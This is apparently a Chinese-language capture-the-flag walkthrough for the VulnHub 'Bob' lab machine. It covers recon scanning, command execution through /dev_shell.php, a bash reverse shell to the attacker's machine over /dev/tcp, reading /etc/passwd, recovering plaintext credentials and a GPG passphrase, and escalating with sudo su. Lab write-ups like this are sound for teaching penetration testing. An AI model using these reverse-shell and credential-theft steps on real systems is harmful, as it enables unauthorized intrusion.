1.靶机部署
kali安装:https://blog.youkuaiyun.com/l2872253606/article/details/123592717?spm=1001.2014.3001.5502
靶机下载: https://download.vulnhub.com/bob/Bob_v1.0.1.ova
使用VMware打开该文件:
设置好名称和虚拟机位置:
注意:导入过程中可能会提示导入失败,点击重试即可。
进行基本设置:
导入成功,打开虚拟机,到此虚拟机部署完成!
注意:靶机的网络连接模式必须和kali一直,让DC靶机跟kali处于同一网段,这用kali才能扫出DC的主机。
2.信息收集
2.1 探测IP
使用nmap扫描一下,发现151开启了80端口,浏览器访问一下发现就是我们的靶场:
192.168.11.0/24
2.2 详细信息扫描
nmap -A -T4 -p- 192.168.11.151
2.3 敏感目录
使用dirsearch扫描一下敏感目录:
dirsearch -u 192.168.11.151 -e *
2.4 指纹收集
扫描一下网站的CMS等信息:
whatweb -v 192.168.11.151
3.渗透过程
3.1 漏洞发现
我们在扫描网站敏感目录的时候曾看见过一个/robots.txt文件,访问一下试试:
逐个访问一下这几个目录,最后在/dev_shell.php文件下发现点东西:
试一下能不能执行linux命令:
3.2 反弹shell
既然可以执行反弹shell命令,那我们试着反弹一下shell,使用bash反弹:
首先kali开启监听:
输入框输入反弹shell代码:
bash -c ‘exec bash -i &>/dev/tcp/192.168.11.128/4444 <&1’
查看用户,发现了六个用户:
cat /etc/passwd | grep /bin/bash
大概对目录进行了查看,最后在/home/bob发现了一个名叫.old_passwordfile.html的文件,查看其内容发现了两组用户名和密码:
jc:Qwerty
seb:T1tanium_Pa$$word_Hack3rs_Fear_M3
3.3 登录用户
使用得到的用户ssh登录,注意端口不是默认端口
继续搜查目录:
在/home/bob/Documents目录下发现了一个login.txt.gpg文件,是个加密文件。
继续搜查,发现一个脚本文件,内容是输出一些语句,每行的首字母都是大写,将每一行的大写字母都提取出来 HARPOCRATES,这会不会就是刚刚加密文件的密码?
回到加密文件所在的地方,解密试试:
gpg --batch --passphrase HARPOCRATES -d login.txt.gpg
解密之后得到bob的用户名和密码:
bob:b0bcat_
使用bob用户登录,注意端口不是默认的22:
ssh bob@192.168.11.151 -p 25468
3.4 提权
查看bob有什么权限:
sudo -l
ALL,这是什么操作,bob拥有root用户的所有权限,那还不直接起飞:
果然,童话里都是骗人的,乖乖提权吧!!!
既然bob拥有root的所有的权限,那是不是可以直接切换root用户:
sudo su
提权成功!!!